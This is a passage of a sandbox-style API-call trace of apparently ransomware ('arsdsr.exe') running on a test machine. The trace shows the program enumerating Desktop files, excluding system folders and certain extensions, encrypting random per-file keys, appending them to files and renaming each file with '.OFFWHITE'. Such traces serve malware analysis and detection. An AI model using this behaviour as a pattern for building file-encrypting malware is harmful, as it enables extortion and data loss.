GetProcessHeap () returned 0x500000 [0131.913] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.913] GetProcessHeap () returned 0x500000 [0131.913] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.913] GetProcessHeap () returned 0x500000 [0131.913] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.913] GetProcessHeap () returned 0x500000 [0131.913] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.913] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv" [0131.913] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv.OFFWHITE" [0131.913] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4iywkdk1gj 2dr.mkv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4IYwkdk1gj 2DR.mkv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4iywkdk1gj 2dr.mkv.offwhite")) returned 1 [0131.915] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c92fb0, ftCreationTime.dwHighDateTime=0x1d5dfc5, ftLastAccessTime.dwLowDateTime=0x6a1832d0, ftLastAccessTime.dwHighDateTime=0x1d5e266, ftLastWriteTime.dwLowDateTime=0x6a1832d0, ftLastWriteTime.dwHighDateTime=0x1d5e266, nFileSizeHigh=0x0, nFileSizeLow=0x2611, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="5htH-odBM4.gif", cAlternateFileName="5HTH-O~1.GIF")) returned 1 [0131.915] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2=".") returned 1 [0131.915] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="..") returned 1 [0131.915] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="...") returned 1 [0131.915] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="windows") returned -1 [0131.915] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="$recycle.bin") returned 1 [0131.916] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="rsa") returned -1 [0131.916] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="ntuser.dat") returned -1 [0131.916] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="programdata") returned -1 [0131.916] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="appdata") returned -1 [0131.916] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="program files") returned -1 [0131.916] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="program files (x86)") returned -1 [0131.916] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0131.916] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="5htH-odBM4.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif" [0131.916] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.916] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.916] PathFindExtensionW (pszPath="5htH-odBM4.gif") returned=".gif" [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0131.916] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0131.916] lstrcmpiW (lpString1="5htH-odBM4.gif", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0131.916] GetProcessHeap () returned 0x500000 [0131.916] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547e78 [0131.917] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5hth-odbm4.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.917] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=9745) returned 1 [0131.917] GetProcessHeap () returned 0x500000 [0131.917] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.917] GetProcessHeap () returned 0x500000 [0131.917] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.917] GetProcessHeap () returned 0x500000 [0131.917] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.917] GetProcessHeap () returned 0x500000 [0131.917] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.917] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.917] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.917] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.917] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.917] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.917] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.917] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.918] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.918] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.918] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.918] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.918] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.918] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2611, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.918] SetLastError (dwErrCode=0x0) [0131.918] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.920] GetLastError () returned 0x0 [0131.920] GetLastError () returned 0x0 [0131.920] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2711, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.920] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.920] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2811, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.920] WriteFile (in: hFile=0xb0, lpBuffer=0x547e78*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547e78*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0131.920] GetProcessHeap () returned 0x500000 [0131.920] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2611) returned 0x5557b0 [0131.920] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.920] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x2611, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x2611, lpOverlapped=0x0) returned 1 [0131.922] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.922] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x2611, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x2611, lpOverlapped=0x0) returned 1 [0131.922] GetProcessHeap () returned 0x500000 [0131.922] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0131.922] CloseHandle (hObject=0xb0) returned 1 [0131.925] GetProcessHeap () returned 0x500000 [0131.925] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.925] GetProcessHeap () returned 0x500000 [0131.925] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.925] GetProcessHeap () returned 0x500000 [0131.925] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.925] GetProcessHeap () returned 0x500000 [0131.925] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.925] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif" [0131.925] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif.OFFWHITE" [0131.925] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5hth-odbm4.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5htH-odBM4.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5hth-odbm4.gif.offwhite")) returned 1 [0131.927] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7ce66d0, ftCreationTime.dwHighDateTime=0x1d5dabf, ftLastAccessTime.dwLowDateTime=0xae4f47d0, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0xae4f47d0, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="7XzLDIAQ", cAlternateFileName="")) returned 1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2=".") returned 1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2="..") returned 1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2="...") returned 1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2="windows") returned -1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2="$recycle.bin") returned 1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2="rsa") returned -1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2="ntuser.dat") returned -1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2="programdata") returned -1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2="appdata") returned -1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2="program files") returned -1 [0131.927] lstrcmpiW (lpString1="7XzLDIAQ", lpString2="program files (x86)") returned -1 [0131.927] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0131.927] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="7XzLDIAQ" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ" [0131.927] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\" [0131.927] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\" [0131.927] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\*.*" [0131.927] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7ce66d0, ftCreationTime.dwHighDateTime=0x1d5dabf, ftLastAccessTime.dwLowDateTime=0xae4f47d0, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0xae4f47d0, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0xb0ec7c6, cFileName=".", cAlternateFileName="")) returned 0x544650 [0131.928] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0131.928] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7ce66d0, ftCreationTime.dwHighDateTime=0x1d5dabf, ftLastAccessTime.dwLowDateTime=0xae4f47d0, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0xae4f47d0, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0xb0ec7c6, cFileName="..", cAlternateFileName="")) returned 1 [0131.928] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0131.928] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0131.928] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5a83450, ftCreationTime.dwHighDateTime=0x1d5e2e9, ftLastAccessTime.dwLowDateTime=0xb81ba560, ftLastAccessTime.dwHighDateTime=0x1d5e1fe, ftLastWriteTime.dwLowDateTime=0xb81ba560, ftLastWriteTime.dwHighDateTime=0x1d5e1fe, nFileSizeHigh=0x0, nFileSizeLow=0xabce, dwReserved0=0x295debc, dwReserved1=0xb0ec7c6, cFileName="ThnWCLCBt.gif", cAlternateFileName="THNWCL~1.GIF")) returned 1 [0131.928] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2=".") returned 1 [0131.928] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="..") returned 1 [0131.928] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="...") returned 1 [0131.928] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="windows") returned -1 [0131.928] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="$recycle.bin") returned 1 [0131.928] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="rsa") returned 1 [0131.929] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="ntuser.dat") returned 1 [0131.929] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="programdata") returned 1 [0131.929] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="appdata") returned 1 [0131.929] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="program files") returned 1 [0131.929] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="program files (x86)") returned 1 [0131.929] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\" [0131.929] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\", lpString2="ThnWCLCBt.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif" [0131.929] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.929] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.929] PathFindExtensionW (pszPath="ThnWCLCBt.gif") returned=".gif" [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0131.929] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0131.929] lstrcmpiW (lpString1="ThnWCLCBt.gif", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0131.929] GetProcessHeap () returned 0x500000 [0131.929] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547e88 [0131.929] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7xzldiaq\\thnwclcbt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0131.930] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=43982) returned 1 [0131.930] GetProcessHeap () returned 0x500000 [0131.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.930] GetProcessHeap () returned 0x500000 [0131.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.930] GetProcessHeap () returned 0x500000 [0131.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.930] GetProcessHeap () returned 0x500000 [0131.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.931] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.931] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.931] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.931] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.931] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.931] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.931] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.931] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.931] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0131.931] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.931] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.931] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0131.931] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xabce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.931] SetLastError (dwErrCode=0x0) [0131.931] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0131.933] GetLastError () returned 0x0 [0131.933] GetLastError () returned 0x0 [0131.933] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xacce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.933] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0131.933] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xadce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.933] WriteFile (in: hFile=0x21c, lpBuffer=0x547e88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x547e88*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0131.933] GetProcessHeap () returned 0x500000 [0131.933] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xabce) returned 0x5567b8 [0131.933] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.933] ReadFile (in: hFile=0x21c, lpBuffer=0x5567b8, nNumberOfBytesToRead=0xabce, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5567b8*, lpNumberOfBytesRead=0x295dec0*=0xabce, lpOverlapped=0x0) returned 1 [0131.936] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.936] WriteFile (in: hFile=0x21c, lpBuffer=0x5567b8*, nNumberOfBytesToWrite=0xabce, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5567b8*, lpNumberOfBytesWritten=0x295decc*=0xabce, lpOverlapped=0x0) returned 1 [0131.936] GetProcessHeap () returned 0x500000 [0131.936] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5567b8 | out: hHeap=0x500000) returned 1 [0131.936] CloseHandle (hObject=0x21c) returned 1 [0131.949] GetProcessHeap () returned 0x500000 [0131.949] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.949] GetProcessHeap () returned 0x500000 [0131.949] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.949] GetProcessHeap () returned 0x500000 [0131.949] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.949] GetProcessHeap () returned 0x500000 [0131.949] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.949] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif" [0131.949] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif.OFFWHITE" [0131.950] 